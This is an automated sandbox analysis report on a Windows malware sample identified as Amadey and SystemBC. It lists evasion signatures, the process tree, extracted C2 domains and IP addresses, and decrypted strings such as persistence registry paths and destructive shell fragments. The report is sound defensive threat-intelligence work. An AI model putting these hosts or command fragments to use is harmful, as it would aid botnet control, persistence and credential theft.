
Windows Analysis Report
XO4ioEY3nq.exe

Overview

General Information

Sample name: XO4ioEY3nq.exe (renamed because the original name is a hash value)
Original sample name: 73636685f823d103c54b30bc457c7f0d.exe
Analysis ID: 1627459
MD5: 73636685f823d103c54b30bc457c7f0d
SHA1: 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256: 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
Tags: exe, user-abuse_ch

Detection

Amadey, SystemBC
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadey's Clipper DLL
Yara detected SystemBC
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XO4ioEY3nq.exe (PID: 6076 cmdline: "C:\Users\user\Desktop\XO4ioEY3nq.exe" MD5: 73636685F823D103C54B30BC457C7F0D)
    • Gxtuum.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: 73636685F823D103C54B30BC457C7F0D)
      • rundrive.exe (PID: 6176 cmdline: "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe" MD5: 9218E5CAD03C752F237ED87A9E52DEF4)
  • Gxtuum.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)
  • eafkou.exe (PID: 6520 cmdline: C:\ProgramData\rcjuo\eafkou.exe MD5: 9218E5CAD03C752F237ED87A9E52DEF4)
  • Gxtuum.exe (PID: 6500 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)
  • Gxtuum.exe (PID: 2584 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)
  • Gxtuum.exe (PID: 3688 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)
  • Gxtuum.exe (PID: 3716 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: 73636685F823D103C54B30BC457C7F0D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name | Description | Attribution | Blogpost URLs | Link
SystemBC | SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC. SystemBC has been observed occasionally, but more pronounced since June 2019. First samples go back to October 2018. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
{"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
{"HOST1": "towerbingobongoboom.com", "HOST2": "213.209.150.137"}
Source | Rule | Description | Author | Strings
XO4ioEY3nq.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
Process Memory Space: rundrive.exe PID: 6176 | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
Process Memory Space: eafkou.exe PID: 6520 | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
decrypted.memstr | JoeSecurity_Amadey_4 | Yara detected Amadey | Joe Security |

Source | Rule | Description | Author | Strings
8.0.Gxtuum.exe.8d0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
7.0.Gxtuum.exe.8d0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
10.2.Gxtuum.exe.8d0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
10.0.Gxtuum.exe.8d0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
7.2.Gxtuum.exe.8d0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T13:15:16.934308+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 107.189.27.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T13:15:19.077288+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 107.189.27.66 | 80 | TCP
2025-03-02T13:15:38.193887+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 107.189.27.66 | 80 | TCP
2025-03-02T13:15:42.592965+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 49790 | 107.189.27.66 | 80 | TCP
2025-03-02T13:15:46.951710+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61684 | 107.189.27.66 | 80 | TCP
2025-03-02T13:15:51.286074+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61716 | 107.189.27.66 | 80 | TCP
2025-03-02T13:15:55.810462+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61740 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:00.168902+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61772 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:04.690691+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61804 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:09.048275+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61834 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:13.379738+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61862 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:17.751981+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61864 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:22.141775+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61866 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:26.613810+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61868 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:30.967145+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61870 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:35.332293+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61872 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:39.700458+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61874 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:44.080935+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61876 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:48.456566+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61878 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:52.819517+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61880 | 107.189.27.66 | 80 | TCP
2025-03-02T13:16:57.271130+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61882 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:01.652078+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61884 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:06.065993+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61886 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:10.578393+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61888 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:15.002537+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61890 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:19.369440+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61892 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:23.752294+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61894 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:28.090740+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61896 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:32.486039+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61898 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:36.892451+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61900 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:41.275660+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61902 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:45.666257+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61904 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:50.019126+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61906 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:54.392231+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61908 | 107.189.27.66 | 80 | TCP
2025-03-02T13:17:58.791128+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61910 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:03.166543+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61912 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:07.616960+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61914 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:11.973686+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61916 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:16.382226+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61918 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:20.769244+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61920 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:25.135343+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61922 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:29.472363+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61924 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:34.165326+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61926 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:38.570650+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61928 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:42.948676+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61930 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:47.321810+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61932 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:51.750178+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61934 | 107.189.27.66 | 80 | TCP
2025-03-02T13:18:56.178261+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61936 | 107.189.27.66 | 80 | TCP
2025-03-02T13:19:00.654904+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61938 | 107.189.27.66 | 80 | TCP
2025-03-02T13:19:05.058313+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61940 | 107.189.27.66 | 80 | TCP
2025-03-02T13:19:09.457697+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61942 | 107.189.27.66 | 80 | TCP
2025-03-02T13:19:13.842864+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61944 | 107.189.27.66 | 80 | TCP
2025-03-02T13:19:18.380076+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.5 | 61946 | 107.189.27.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T13:15:21.359962+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 45.59.120.8 | 80 | TCP

AV Detection

Source: towerbingobongoboom.com | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php7m | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpiYl | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpx | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpim | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpFm | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpV? | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpir | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php& | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpe | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpxm | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php6l | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpi | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phphl | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpY | Avira URL Cloud: Label: malware
Source: cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php | Avira URL Cloud: Label: malware
Source: XO4ioEY3nq.exe | Malware Configuration Extractor: Amadey {"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
Source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "213.209.150.137"}
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | ReversingLabs: Detection: 73%
Source: XO4ioEY3nq.exe | Virustotal: Detection: 61%
Source: XO4ioEY3nq.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: " && timeout 1 && del
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Keyboard Layout\Preload
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: /3ofn3jf3e2ljk/index.php
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cobolrationumelawrtewarms.com
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Panda Security
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cred.dll|clip.dll|
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Doctor Web
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: kernel32.dll
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: a58456755d
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: 360TotalSecurity
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: shell32.dll
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Bitdefender
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: ProgramData\
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: AVAST Software
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Kaspersky Lab
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Gxtuum.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: %USERPROFILE%
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: ProductName
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: "taskkill /f /im "
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: shutdown -s -t 0
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: rundll32.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: WinDefender
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: 0123456789
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Powershell.exe
Source: 00000002.00000002.2098883982.0000000000D77000.00000004.00000020.00020000.00000000.sdmp | String decryptor: CurrentBuild
Source: XO4ioEY3nq.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: XO4ioEY3nq.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000AF011 FindFirstFileExW, 0_2_000AF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0090F011 FindFirstFileExW, 1_2_0090F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_0090F011 FindFirstFileExW, 2_2_0090F011

Networking

Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49705 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49704 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49758 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61684 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49790 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61740 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61716 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61772 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61804 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61834 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61868 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61864 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61890 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61876 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61884 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61888 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61886 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61898 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61912 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61870 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61916 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61940 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61896 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61930 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61900 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61906 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61866 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61878 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61882 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61892 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61904 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61920 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61862 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61874 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61914 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61922 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61872 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61944 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61902 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61928 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61946 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61908 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61894 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61936 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61918 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61910 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:61942 -> 107.189.27.66:80
